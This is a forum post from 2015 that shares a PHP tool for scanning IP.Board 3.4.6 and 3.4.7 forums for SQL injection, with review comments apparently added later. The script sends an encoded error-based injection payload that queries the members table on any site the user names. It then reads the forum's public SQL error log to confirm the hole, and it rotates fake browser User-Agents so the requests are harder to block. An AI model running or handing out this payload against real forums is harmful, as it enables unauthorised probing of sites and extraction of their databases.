
IPB 3.4.6 | 3.4.7 SQLi Checker

Тема в разделе IPB, создана пользователем ERROR404, 31 окт 2015.

  1. ERROR404 Администратор

    <?php
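    // Entry point. Reads a forum base URL from ?q=, sends one POST to
    // <base>/interface/ipsconnect/ipsconnect.php, then fetches
    // <base>/cache/sql_error_latest.cgi and reports whether the text
    // "XPATH syntax error" appears in it.
    //
    // NOTE(review): the verdict is only as good as that log file. An entry left
    // by an earlier request also matches, and a log that is missing or not
    // served over HTTP (for example a 404 page) yields the "not vulnerable"
    // message even though nothing was confirmed.
    // NOTE(review): the server running this script requests whatever host q
    // names, loopback and internal addresses included; access to this page
    // should be limited accordingly.
    if (isset($_GET['q'])) {

      // ?q[]=... arrives as an array; substr()/string functions on it raise a
      // TypeError on PHP 8, so anything that is not a string is treated as invalid.
      $host = is_string($_GET['q']) ? $_GET['q'] : '';

      // Require an explicit http or https scheme and a host part. The original
      // prefix test ("http") also accepted strings such as "httpfoo".
      $scheme  = strtolower((string) parse_url($host, PHP_URL_SCHEME));
      $hasHost = (string) parse_url($host, PHP_URL_HOST) !== '';

      if (($scheme === 'http' || $scheme === 'https') && $hasHost) {

        //Removes any trailing slashes
        $host = rtrim($host, '/');

        // $host comes straight from the query string and is echoed into the
        // page below; escape it so it cannot inject markup (reflected XSS).
        $safeHost = htmlspecialchars($host, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

        //Initial SQL Injection check
        $newHost = $host . '/interface/ipsconnect/ipsconnect.php';
        $data    = "act=login&idType=id&id[]=-1&id[]=-1%29%20and%201%21%3D%22%27%22%20and%20extractvalue%281%2Cconcat%280x3a%2C%28SELECT%20COUNT%28%2A%29%20FROM%20members%29%29%29%23%27";
        // The reply body is not inspected; the result is read from the error log.
        SendPost($newHost, $data);

        //Checking the SQL Error Log for confirmation
        $url      = $host . '/cache/sql_error_latest.cgi';
        $response = SendGet($url);
        if (!is_string($response)) {
          // curl failed outright (DNS, connect, TLS, ...): nothing was learned.
          printf("%s could not be checked: the SQL error log was not retrievable.", $safeHost);
        } elseif (strpos($response, "XPATH syntax error") !== false) {
          printf("%s is vulnerable to IPBoard 3.4.6 or 3.4.7 SQL Injection!", $safeHost);
        } else {
          printf("%s is not vulnerable to IPBoard 3.4.6 or 3.4.7 SQL Injection!", $safeHost);
        }
        return false;
      } else {
        echo "Invalid host, needs to have a protocol -> http://apples.org/path/to/forums";
      }
    } else {
      echo "I think you're lost homie.";
    }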
    
    //So you cant be blocked via useragent
    /**
     * Returns one entry from a fixed list of eight browser User-Agent strings.
     *
     * The request helpers in this file send the returned value instead of
     * curl's default User-Agent. Every entry names a browser of the
     * Firefox 2 / MSIE 7 / Opera 9 generation or older. The index is drawn
     * with rand(), so the choice is not cryptographically random.
     *
     * @return string one of the hard-coded User-Agent strings
     */
    function getRandomUserAgent()
    {
      $pool = array(
        "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6",
        "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
        "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)",
        "Opera/9.20 (Windows NT 6.0; U; en)",
        "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50",
        "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.02 [en]",
        "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; fr; rv:1.7) Gecko/20040624 Firefox/0.9",
        "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/48 (like Gecko) Safari/48"
      );

      // Highest valid index of the list; rand() is inclusive on both ends.
      $lastIndex = count($pool) - 1;

      return $pool[rand(0, $lastIndex)];
    }
    
    //Sends a post request
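    /**
     * Sends an HTTP POST to $site with $post as the request body and returns
     * the response body.
     *
     * Compared with the original, the transfer is limited to http/https and is
     * bounded by connect and total timeouts, so a URL taken from user input
     * cannot make curl use another protocol handler or hold the PHP worker
     * open indefinitely.
     *
     * @param string       $site absolute URL to post to
     * @param string|array $post request body, passed to CURLOPT_POSTFIELDS as-is
     * @return string|false response body, or false when curl could not be
     *                      initialised or the transfer failed or timed out
     */
    function SendPost($site, $post)
    {
      $ch = curl_init();
      if ($ch === false) {
        return false;
      }

      curl_setopt($ch, CURLOPT_URL, (string) $site);
      curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
      curl_setopt($ch, CURLOPT_USERAGENT, getRandomUserAgent());
      curl_setopt($ch, CURLOPT_POSTFIELDS, $post);

      // Only plain web requests; rejects file://, gopher://, etc.
      curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);

      // Bounds chosen for this edit (seconds); the original had no limit.
      curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
      curl_setopt($ch, CURLOPT_TIMEOUT, 20);

      $response = curl_exec($ch);
      curl_close($ch);
      return $response;
    }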
    
    //Sends a get request, specifically for reading the sql error cgi
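    /**
     * Fetches $site with an HTTP GET and returns the response body without
     * headers.
     *
     * Compared with the original, the transfer is limited to http/https and is
     * bounded by connect and total timeouts, so a URL taken from user input
     * cannot make curl use another protocol handler or hold the PHP worker
     * open indefinitely.
     *
     * @param string $site absolute URL to fetch
     * @return string|false response body, or false when curl could not be
     *                      initialised or the transfer failed or timed out
     */
    function SendGet($site)
    {
      $ch = curl_init();
      if ($ch === false) {
        return false;
      }

      curl_setopt($ch, CURLOPT_URL, (string) $site);
      curl_setopt($ch, CURLOPT_USERAGENT, getRandomUserAgent());
      // Body only: response headers are left out of the returned string.
      curl_setopt($ch, CURLOPT_HEADER, 0);
      curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

      // Only plain web requests; rejects file://, gopher://, etc.
      curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);

      // Bounds chosen for this edit (seconds); the original had no limit.
      curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
      curl_setopt($ch, CURLOPT_TIMEOUT, 20);

      $response = curl_exec($ch);
      curl_close($ch);
      return $response;
    }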
     
    31 окт 2015 #1